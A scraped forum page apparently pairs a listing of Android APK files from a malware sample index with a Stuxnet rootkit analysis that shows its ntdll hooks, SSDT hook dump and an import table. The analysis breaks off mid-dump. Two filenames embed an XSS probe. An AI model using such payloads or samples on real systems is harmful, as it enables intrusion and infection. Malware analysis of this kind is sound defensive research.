0cc55f6bf9329f3c5e3c11a42caafcf65f98ad59a6a92ecfc8498b6987574925.bin.apk  14-Nov-2014 15:48  110K
0va1s.apk  14-Nov-2014 15:44  2.2M
00b65a502bcb79a9f516c3aa8703a50f.apk  14-Nov-2014 15:46  6.0M
00c154b42fd483196d303618582420b89cedbf46.apk  14-Nov-2014 15:49  586K
0274a66cd43a39151c39b6c940cf99b459344e3a.apk  14-Nov-2014 15:44  4.3M
06eb19d137ff0a0ccd778b236e8d45c3b9b078115b2ed69baf06aee0244980c1.apk  14-Nov-2014 15:46  478K
06f3b82f301c97b2da71f4fdc8ed0e6046381981581dbf7714511abca47d3387.apk  14-Nov-2014 15:44  947K
08170-Caveman-Run-v.1.0.6.apk  14-Nov-2014 15:47  12M
1.apk  14-Nov-2014 15:49  569K
1 Click Direction (1.2.9).apk  14-Nov-2014 15:49  179K
1Framaroot-1.6.1.apk  14-Nov-2014 15:47  908K
1_com.jordangoierri.plantilla.apk  14-Nov-2014 15:45  2.3M
1b980ea6ef0e2c2c5b3f92036d5e2624f4f5e312ecd2c3755c65caa7af1425b8.bin.apk  14-Nov-2014 15:49  231K
1be67a22077b65d6f2f6d2e8855c43d1803e35ebd982f7aa06a4c45dd5dea5cc.apk  14-Nov-2014 15:44  317K
1df2c9af1bfd8093023afb212926b689e3b3a1dabb60ca2a7d627c602eea83a8.apk  14-Nov-2014 15:44  217K
1gb.ru-1.0.20-1408030426.apk  14-Nov-2014 15:44  520K
2.1.apk  14-Nov-2014 15:49  8.4M
2.apk  14-Nov-2014 15:44  12M
2caner.apk  14-Nov-2014 15:45  22K
2xBatteryPro-BatterySaverv2.91apkmania.com.apk  14-Nov-2014 15:46  3.2M
3D_MAVEN_Music_Player_Pro_1_12_65.apk  14-Nov-2014 15:45  5.8M
3a37618573de905337f3ef372863ba7dccd4adc03e41eb46c2033099c2325901.apk  14-Nov-2014 15:45  311K
3af3e5df527a8df1c7dc18b6fb6a4f6430dcb64665942dea83e77d2c5a32852d.bin.apk  14-Nov-2014 15:44  2.2M
3cb3a04b13ac22b5503b32209dbd288809bd1c29b32e06bbf3fd433da8f70ecb.apk  14-Nov-2014 15:46  1.2M
3f3tt34tgdsvs.apk  14-Nov-2014 15:48  178K
4PlayerReactor.apk  14-Nov-2014 15:47  1.9M
4bebdaa1b0b82d497f0e1a172779c073f8d24b44b588c152493400b1c0f63bf5.bin.apk  14-Nov-2014 15:49  149K
4g55h.apk  14-Nov-2014 15:48  1.5M
5.apk  14-Nov-2014 15:44  19K
6.apk  14-Nov-2014 15:47  19K
6e9848008c42128623d1077f0cc75c0861e2b3d0fb76e68c5fc9ec8f69361572.apk  14-Nov-2014 15:47  1.1M
6ea6a44433e321d81fea8fd2c91d5f7d71f57136b979cc85dac90ab5f8f7b070.apk  14-Nov-2014 15:44  112K
6eb2a685bc4fa7b825fe7e40d1b4263bb38f3dc01f91a578ab9c75049fc4054f.apk  14-Nov-2014 15:47  1.3M
6eb9e5b879ab3088872a755b86ae6f928df3927fdbab30ab0d7a8469902c3779.apk  14-Nov-2014 15:44  698K
6eb51ab4443b237ffdfee833801b39a41e5b6f67d70e38193d96bb61472a4c14.apk  14-Nov-2014 15:47  4.4M
6ec9c3033b2051d18762eca6116aec2bf1279360ea358256282da71e1c87eb13.apk  14-Nov-2014 15:44  76K
6ed52331a788ef18727c8e34746b59db81acdb261659934be63b0266fb7c19e7.apk  14-Nov-2014 15:44  1.8M
6f1af02b1836ac348e90b0ac69cd57f1f396b9b1d886be1b007af1b6a5b7008d.apk  14-Nov-2014 15:44  2.5M
6f2e2f2bac1438cd088de25bb34c6dea20b41ac7756df397e661013664d56d95.apk  14-Nov-2014 15:48  3.0M
6f3bdc06a6148f184a45bd42a90a5e018ea5d1eddb65bd408c424246fd61233b.apk  14-Nov-2014 15:44  3.4M
6f3ff062c0a4ca13a12c68fb3fc17a12f75bd18ba6cb76cc82660f026a966990.apk  14-Nov-2014 15:47  3.1M
6f4d28a17226911cc4cf61502ad6b2ccc1686ec19e83149c609c153c6cc3ee7e.apk  14-Nov-2014 15:45  3.9M
6f5c03106c784fa468a0fab348cf73934dfe0db68428ff8f9a55657bb31cb056.apk  14-Nov-2014 15:45  2.3M
6f5cff74185ba9bdbc9333c1b025371cd2d109a76fc953f2212f19b9481258e8.apk  14-Nov-2014 15:46  508K
7net.apk  14-Nov-2014 15:45  19K
8fh4oc??.apk  14-Nov-2014 15:45  126K
9.6.29.326419fullscreenHDByCatalflex.apk  14-Nov-2014 15:47  6.1M
9.6.29.341779_ANS_final+.apk  14-Nov-2014 15:48  6.0M
9_appinventor.ai_designsandroid.Horarios_Renfe_1.apk  14-Nov-2014 15:44  1.3M
9a049a19f35e736bc408edb6bb80dd1623ccd3365fed9aa3e5eca341a89c0901.bin.apk  14-Nov-2014 15:45  705K
9b88bbfc71fe89ae580db09ac750e00e4e93787b83aaed6b919ccc3f364d0d4c.apk  14-Nov-2014 15:45  135K
9f3a50de2e3ffbd49b0157091feba812.apk  14-Nov-2014 15:44  63K
10_com.flappy.flappydoge.apk  14-Nov-2014 15:49  1.9M
20F048DFED44B43F905379CB12D4FC91.apk  14-Nov-2014 15:47  381K
23.apk  14-Nov-2014 15:44  48M
30_Day_Fitness_2.2.apk  14-Nov-2014 15:46  18M
32.apk  14-Nov-2014 15:44  40K
39e1c05b3541f249a7714af72999492a5a813ef67c80647e4b1b286975c36b9f.bin.apk  14-Nov-2014 15:44  131K
40f1146e35096e44dab5276d21e7e2e35632053e.apk  14-Nov-2014 15:45  108K
46_PY-batr-2C5.apk  14-Nov-2014 15:44  1.5M
71bdbfcaca7c106f1b596bc53a1ddcd909e05331e412ed00ca0753441dc2bbad.bin.apk  14-Nov-2014 15:48  320K
72ab84bf406504de10ed0f0ae41aa08e.apk  14-Nov-2014 15:48  159K
80a101a2d0e1f53724159113d6e8fe2f.apk  14-Nov-2014 15:44  967K
83c6414c9c7964f4fb88e0d2477c20e4.apk  14-Nov-2014 15:46  2.8M
98aac4b0-b70e-43af-91e6-c298969862ee_item.apk  14-Nov-2014 15:46  149K
111.apk  14-Nov-2014 15:45  61K
115_android_v4.0.0.apk  14-Nov-2014 15:44  9.6M
170sam_40_samsung_I5510_en_ar_tr_signed20101014.apk  14-Nov-2014 15:44  495K
190.apk  14-Nov-2014 15:48  37K
255ede5235739c2adde33ce8d022355633287356210080f746a3a4b83d98c910.apk  14-Nov-2014 15:49  213K
333.apk  14-Nov-2014 15:44  9.1M
347_???.apk  14-Nov-2014 15:47  481K
360_Clean_Droid_2_0_3_www.AndroidHa.com.apk  14-Nov-2014 15:45  3.6M
360browser_phone.apk  14-Nov-2014 15:47  5.1M
421and.apk  14-Nov-2014 15:48  135K
428.apk  14-Nov-2014 15:45  106K
436_Robird_2_0_1.apk  14-Nov-2014 15:49  1.5M
444.apk  14-Nov-2014 15:46  19K
500_Firepaper_1_04.apk  14-Nov-2014 15:44  140K
500px_Inspiring_Photos_2_1.apk  14-Nov-2014 15:44  2.9M
615fe78f3a644cb63df8b7918fb8d503SMS_Replicator_Secret.apk  14-Nov-2014 15:44  62K
736c2f95dcbc4b192e77b1e155c4cd3c1e2cd34334444a3ac64191b74cefe5e2.apk  14-Nov-2014 15:45  387K
777.apk  14-Nov-2014 15:48  19K
878fd235a4e34868f3a6243353e21bcc13e9eac7.apk  14-Nov-2014 15:46  11M
888.apk  14-Nov-2014 15:47  19K
948d0b99cd012738f0377038a699f41174c1b64170178ea5a7038a0b5174fdf3.apk  14-Nov-2014 15:44  336K
1451.apk  14-Nov-2014 15:46  516K
1923f6b154c79224cf6b5e4d584ccfb4.apk  14-Nov-2014 15:46  652K
2014.10.apk  14-Nov-2014 15:46  600K
2101.apk  14-Nov-2014 15:46  454K
2312bsam_40_samsungtasss5570_signed_20101222.apk  14-Nov-2014 15:47  541K
3507.Automattic.Inc-WordPress_v2.3.2.apk  14-Nov-2014 15:47  1.7M
3536ba06a0d71b0f0a6f30f98ae0485c.apk  14-Nov-2014 15:47  1.8M
4682.apk  14-Nov-2014 15:47  171K
5001 Amazing Facts (1.4).apk  14-Nov-2014 15:44  4.2M
5203ac33.apk  14-Nov-2014 15:47  1.1M
5444.apk  14-Nov-2014 15:44  1.4M
10627-Rocket-Robo-2.apk  14-Nov-2014 15:47  8.2M
11115-Warhammer-40.000-Carnage-v182886.apk  14-Nov-2014 15:44  12M
26213_foto.apk  14-Nov-2014 15:47  748K
88870ad3c7bd42cfe1d728b4a4ccc104.apk  14-Nov-2014 15:44  307K
333333.apk  14-Nov-2014 15:44  19K
414448f7891b967d55d60b4e3787940a.apk  14-Nov-2014 15:47  1.0M
996536_18591898_1407754377368.apk  14-Nov-2014 15:44  3.3M
36203881a8a68c2feee5adb844abeb25.apk  14-Nov-2014 15:44  2.4M
1394640204-my-talking-tom-v1.4.1.apk  14-Nov-2014 15:49  14M
1645225337.apk  14-Nov-2014 15:49  5.2M
<svgonload=alert(1)>xss.apk  14-Nov-2014 15:44  5.2M
<svgonload=alert(1)>xsss.apk  14-Nov-2014 15:44  309K
AAFarm_rev.6.apk  14-Nov-2014 15:48  3.1M
AC62E4ECAEDEA6351D80C352EB8FCBAF.apk  14-Nov-2014 15:47  5.6M
AC339.apk  14-Nov-2014 15:47  3.8M
AFWall-1.3.0.1-Free.apk  14-Nov-2014 15:47  3.5M
AG Aussie News (2.2).apk  14-Nov-2014 15:45  94K
AG Dutch Newspapers - Kranten (2.0).apk  14-Nov-2014 15:44  87K
AIME.apk  14-Nov-2014 15:45  2.4M
AIMP.apk  14-Nov-2014 15:48  1.7M
AMAPNetworkLocation.apk  14-Nov-2014 15:45  158K
ANDR.apk  14-Nov-2014 15:49  123K
ANDxJoe.apk  14-Nov-2014 15:45  108K
ANTPlusPlugins.apk  14-Nov-2014 15:44  415K
AOSM.apk  14-Nov-2014 15:45  176K
APK-instrumenter.apk  14-Nov-2014 15:44  454K
APNdroid.apk  14-Nov-2014 15:46  62K
APPLE.apk  14-Nov-2014 15:46  5.0M
ARMv6+VFP+Codec+1.7.1.apk  14-Nov-2014 15:45  4.0M
ASTRO.Pro.Key.v1.0.1.apk  14-Nov-2014 15:44  15K
ASTRO File Manager (2.3.1).apk  14-Nov-2014 15:46  2.0M
ASTROFileManagerBrowserProv4.3.467-android-zone.org.apk  14-Nov-2014 15:48  5.1M
ATumble (1.70).apk  14-Nov-2014 15:49  83K
AccuWeatherPlatinumv3.2.10.3.paid.apk  14-Nov-2014 15:47  7.1M
Act 1 Video Player (2.10.0).apk  14-Nov-2014 15:47  127K
Activities.apk  14-Nov-2014 15:48  3.9M
Activity.pro.v3.0.1.apk  14-Nov-2014 15:44  1.6M
AdAway.apk  14-Nov-2014 15:48  2.6M
AdAwayv2.6apkgalaxy.com.apk  14-Nov-2014 15:49  2.9M
Adfree.apk  14-Nov-2014 15:48  22K
Adjustable_Torch_ROOT_1_6_1.apk  14-Nov-2014 15:45  430K
AdobeFlashPlayer.apk  14-Nov-2014 15:45  73K
AdobePhotoshopTouchv1.5.1.apk  14-Nov-2014 15:44  46M
Advanced Bubble Level Pro (1.0.1).apk  14-Nov-2014 15:48  459K
Advanced Task Killer PRO (1.7.6).apk  14-Nov-2014 15:44  48K
Advanced Task Manager (4.0.1).apk  14-Nov-2014 15:46  166K
Age.of.Conquest.N.America.v1.0.3.apk  14-Nov-2014 15:44  2.1M
Air.apk  14-Nov-2014 15:44  2.9M
AirDroid_1.0.5beta.apk  14-Nov-2014 15:44  3.8M
AirDroid_2.1.0.apk  14-Nov-2014 15:45  11M
Airadvance.v1.01.apk  14-Nov-2014 15:44  7.2M
Aircontrolfull.v1.20.apk  14-Nov-2014 15:48  2.4M
Akbank_Direkt_Tablet.apk  14-Nov-2014 15:45  6.0M
Akinator (2.0).apk  14-Nov-2014 15:49  1.9M
Alarm Master (1.0).apk  14-Nov-2014 15:44  596K
Alarming! Alarm Clock (2.2.0).apk  14-Nov-2014 15:45  637K
Album Art Grabber (1.1.5).apk  14-Nov-2014 15:46  40K
Alchemy.premium.v1.9.1.apk  14-Nov-2014 15:47  2.5M
Aldiko Book Reader Premium (1.2.9).apk  14-Nov-2014 15:47  1.2M
Alexander-kingdom.strategy.alexander-36-v4.3.apk  14-Nov-2014 15:46  5.3M
AliExpress__3.4.2.apk  14-Nov-2014 15:48  7.9M
All Radio Stations (1.0).apk  14-Nov-2014 15:47  2.9M
AllSport GPS (3.0.54).apk  14-Nov-2014 15:45  642K
AltinGonder800x1280.apk  14-Nov-2014 15:44  7.3M
Always Flash (26.03.21).apk  14-Nov-2014 15:48  16K
AlwaysonPC+v2.7.4.apk  14-Nov-2014 15:48  766K
Amarok Remote.apk  14-Nov-2014 15:46  26K
Amazed2.apk  14-Nov-2014 15:49  1.6M
AmazonApps-release.apk  14-Nov-2014 15:45  5.2M
Ambling BookPlayer Personal (1.7).apk  14-Nov-2014 15:45
right]328K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AnTuTuBenchmark_4.3.2_1395060796084.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]9.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndAR Model Viewer (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]116K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndCAD (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]664K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndCam3D (1.3.2).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]283K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndFTP.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]450K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndTorrent (0.89.3).apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]109K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndWobble (1.9).apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]306K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroMote Pro (1.2.3).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]278K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Andro Shark (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]426K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroZip File Manager (0.9.8.1).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]287K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androffice (0.98).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]786K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android-Hardware-Info-indirAPK.com_.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 51K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android-QJ(4).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 44K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android-QJ.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 44K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: 
right]108K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidAV.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]3.7M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidApplication1.AndroidApplication1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]625K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Arcade Emulator (1.0.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android File Browser (2.0).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 20K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android IRC (1.7.2).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]104K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Lock (1.0.0).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]1.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidLollipop1.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]6.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Mate (1.0.9).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]171K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidSensorBox.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]3.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android VNC viewer.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 83K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Xtralogic Remote Client (1.5.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]314K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android_Play.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]498K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android_RDP_Client_v2.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]250K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android_Weather_amp_Clock_Widget_3_5_5.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]3.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] 
[TD]Androidrollergapp.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]1.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androids Fortune (0.1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right] 60K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androidtuxedohvga.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]1.7M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Angry_BirdTransformers_1.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]536K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Angry_Birds_Go_.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]491K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Animal Translator (1.0)..apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 61K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Anomaly2v1.0[Mali-400MP]apkmania.com.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AnonymousEmail (1.0.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 13K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AntiEmuGadget.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 47K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Anti_Spy_Mobile_PRO_v1_9_9_4.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]138K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Antibody.v1.6.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]399K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Antigen.v1.1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]2.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Any Clip Pro (1.2.8).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 52K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AnyRSS reader Widget (3.4).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]147K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ape.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]584K[/TD] [TD] [/TD] [/TR] [TR] 
[TD][/TD] [TD]ApiDemos.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Apollo.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]App.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 25K[/TD] [TD] [/TD] [/TR] [/TABLE] Sursa si multe altele: Index of /samples
-
[h=3]Stuxnet - User/Kernel-Mode analysis[/h]

Today I'll be taking a look at Stuxnet, and at a kernel level mostly (as usual) more than its impact on user-mode. I'll still however be going over a few user-mode things as it ties in with our kernel level discussion. I also won't go in-depth regarding all of the ways Stuxnet uses its four-slot toolbelt of zero-day flaws, and a lot of Stuxnet's other methods of attack (network, etc). ESET, Symantec, and others have done a fantastic job in that regard.

What is Stuxnet?

First of all, it's important (and a bit hilarious) to know the story behind Stuxnet. If you're researching Stuxnet for the first time, it's really easy to get confused. There's finger pointing, claims, supposed "confirmed sources", etc, left and right. I'll briefly go over it. For example:

Confirmed: US and Israel created Stuxnet, lost control of it.
The article is adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power, and it confirms that both the US and Israeli governments developed and deployed Stuxnet.

Obama Order Sped Up Wave of Cyberattacks Against Iran.
Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet.

US unleashed Stuxnet cyber war on Iran to appease Israel – report.
The US and Israel made the Stuxnet virus as a new kind of weapon targeted against Iran, a media investigation revealed. The operation reportedly started in the Bush era, but was intensified by the Obama administration.

Snowden confirms NSA created Stuxnet with Israeli aid.
"The NSA and Israel wrote Stuxnet together," Snowden told Applebaum in the interview that was carried out in May.

The big TLDR is here - Operation Olympic Games. My initial reaction was "What the hell am I reading?", and it still sort of is. It goes on and on.

All in all, after reading the above, you're likely inclined to believe that the US (and maybe even Israel) were behind Stuxnet. Whether or not this is true is a story for another day, although it's easier to lean towards 'yes' than it is to 'no'. The reason for this is due to the fact that Stuxnet, as I discussed above, used four zero-day flaws within Windows. It's a pretty big deal when malware exploits one zero-day flaw within the OS, but four is extremely high. It's also pretty laughable to think that Stuxnet was created by amateurs not invested in any sort of organization regarding cyber warfare, etc of some sort, or amateurs in general. A lot of amateurs make malware for a lot of reasons, but causing nuclear centrifuges to commit suicide is pretty advanced. Aside from the many reasons to believe the answer is yes, some may lean towards no, and it's largely due to the fact that most cannot imagine the US and Israel working closely together to create something like Stuxnet.

I digress, and in any case, I'm not here to discuss politics or debate the true creator(s), so let's just get to the part where we talk about what Stuxnet was primarily created for.

Stuxnet is a worm that was developed primarily to target industrial PLCs, which led to the nuclear centrifuges ultimately destroying themselves. The malware obviously couldn't be outright sent to the nuclear facilities themselves, so this is where its USB attack vector comes into play. More notably known as a supply chain attack:

So the creators of Stuxnet, they were thinking that these companies would do some communications with power plant workers; maybe exchange with USB devices. That's probably how Stuxnet infected the system.
Stuxnet patient zero: Kaspersky Lab identifies worm's first victims in Iran.

In the end, Stuxnet ended up destroying nearly one-fifth of Iran's centrifuges.
In November 2010, it was reported that uranium enrichment within the Natanz nuclear facility had halted several times due to severe technical issues.

User-Mode

Stuxnet has two ways of injecting itself into the address space of a process and then executing exported functions. Stuxnet's user-mode modules are implemented as DLLs, and the first method is done by injecting itself into a preexisting process.

Preexisting Process Inject

1. Allocates a memory buffer in the calling process for the modules to be loaded.
2. Patches ntdll and hooks the following APIs:
ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZwQuerySection

Here's what a clean (unpatched) ntdll MZ header looks like:

We can see some of these hooks in action:

ServiceDescriptor n°0
---------------------
ServiceTable : nt!KiServiceTable (804e26a8)
ParamTableBase : nt!KiArgumentTable (80510088)
NumberOfServices : 0000011c

Index Args Check System call
----- ---- ----- -----------
0019 0001 HOOK-> f8c5761c ##### Original -> nt!NtClose (805678dd)
0029 0007 HOOK-> f8c575d6 ##### Original -> nt!NtCreateKey (8057065d)
0032 0007 HOOK-> f8c57626 ##### Original -> nt!NtCreateSection (805652b3)
0035 0008 HOOK-> f8c575cc ##### Original -> nt!NtCreateThread (8058e63f)
003F 0001 HOOK-> f8c575db ##### Original -> nt!NtDeleteKey (805952be)
0041 0002 HOOK-> f8c575e5 ##### Original -> nt!NtDeleteValueKey (80592d50)
0044 0007 HOOK-> f8c57617 ##### Original -> nt!NtDuplicateObject (805715e0)
0062 0002 HOOK-> f8c575ea ##### Original -> nt!NtLoadKey (805aed5d)
007A 0004 HOOK-> f8c575b8 ##### Original -> nt!NtOpenProcess (805717c7)
0080 0004 HOOK-> f8c575bd ##### Original -> nt!NtOpenThread (8058a1bd)
00B1 0006 HOOK-> f8c5763f ##### Original -> nt!NtQueryValueKey (8056a1f1)
00C1 0003 HOOK-> f8c575f4 ##### Original -> nt!NtReplaceKey (8064f0fa)
00C8 0003 HOOK-> f8c57630 ##### Original -> nt!NtRequestWaitReplyPort (80576ce6)
00CC 0003 HOOK-> f8c575ef ##### Original -> nt!NtRestoreKey (8064ec91)
00D5 0002 HOOK-> f8c5762b ##### Original -> nt!NtSetContextThread (8062dcdf)
00ED 0003 HOOK-> f8c57635 ##### Original -> nt!NtSetSecurityObject (8059b19b)
00F7 0006 HOOK-> f8c575e0 ##### Original -> nt!NtSetValueKey (80572889)
00FF 0006 HOOK-> f8c5763a ##### Original -> nt!NtSystemDebugControl (80649ce3)
0101 0002 HOOK-> f8c575c7 ##### Original -> nt!NtTerminateProcess (805822e0)

If we, for example, go ahead and disassemble our hooked nt!NtClose function, we see the following:

lkd> u 0xFFFFFFFFF8C5761C L1
f8c5761c e92d8b23fe jmp f6e9014e

We have a hook regarding nt!NtClose and a jump. Classic rootkit behavior. Let's go further and dump the IAT by loading notepad.exe into OllyDbg and viewing executable modules:

Address Section Type ( Name Comment
0100102C .text Import ( GDI32.AbortDoc
0100131C .text Import msvcrt._acmdln
0100132C .text Import msvcrt._adjust_fdiv
01001300 .text Import ( msvcrt._cexit
01001204 .text Import ( USER32.CharLowerW
01001244 .text Import ( USER32.CharNextW
010011C0 .text Import ( USER32.CharUpperW
01001248 .text Import ( USER32.CheckMenuItem
01001230 .text Import ( USER32.ChildWindowFromPoint
010012D0 .text Import ( comdlg32.ChooseFontW
0100124C .text Import ( USER32.CloseClipboard
010010F8 .text Import ( KERNEL32.CloseHandle
010012B8 .text Import WINSPOOL.ClosePrinter
010012E0 .text Import ( comdlg32.CommDlgExtendedError
010010EC .text Import ( KERNEL32.CompareStringW
0100133C .text Import ( msvcrt._controlfp
01001040 .text Import ( GDI32.CreateDCW
01001214 .text Import ( USER32.CreateDialogParamW
010010B4 .text Import ( KERNEL32.CreateFileMappingW
01001104 .text Import ( KERNEL32.CreateFileW
01001064 .text Import ( GDI32.CreateFontIndirectW
01001020 .text Import ( COMCTL32.CreateStatusWindowW
010011E0 .text Import ( USER32.CreateWindowExW
010012F4 .text Import ( msvcrt._c_exit
010011A4 .text Import ( USER32.DefWindowProcW
01001034 .text Import ( GDI32.DeleteDC
01001158 .text Import ( KERNEL32.DeleteFileW
01001068 .text Import ( GDI32.DeleteObject
010011A8 .text Import ( USER32.DestroyWindow
01001198 .text Import ( USER32.DialogBoxParamW
01001294 .text Import ( USER32.DispatchMessageW
0100117C .text Import ( SHELL32.DragAcceptFiles
01001174 .text Import ( SHELL32.DragFinish
01001178 .text Import ( SHELL32.DragQueryFileW
01001210 .text Import ( USER32.DrawTextExW
0100125C .text Import ( USER32.EnableMenuItem
0100120C .text Import ( USER32.EnableWindow
01001288 .text Import ( USER32.EndDialog
01001030 .text Import ( GDI32.EndDoc
01001028 .text Import ( GDI32.EndPage
01001054 .text Import ( GDI32.EnumFontsW
01001308 .text Import ( msvcrt._except_handler3
010012F0 .text Import ( msvcrt._exit
01001318 .text Import ( msvcrt.exit
0100111C .text Import ( KERNEL32.FindClose
01001120 .text Import ( KERNEL32.FindFirstFileW
010012C8 .text Import ( comdlg32.FindTextW
010010F4 .text Import KERNEL32.FoldStringW
0100114C .text Import ( KERNEL32.FormatMessageW
0100115C .text Import ( KERNEL32.GetACP
01001188 .text Import ( USER32.GetClientRect
01001114 .text Import ( KERNEL32.GetCommandLineW
010010C0 .text Import ( KERNEL32.GetCurrentProcess
0100110C .text Import ( KERNEL32.GetCurrentProcessId
0100108C .text Import ( KERNEL32.GetCurrentThreadId
01001238 .text Import ( USER32.GetCursorPos
010010A0 .text Import ( KERNEL32.GetDateFormatW
01001194 .text Import ( USER32.GetDC
010011E4 .text Import ( USER32.GetDesktopWindow
01001060 .text Import ( GDI32.GetDeviceCaps
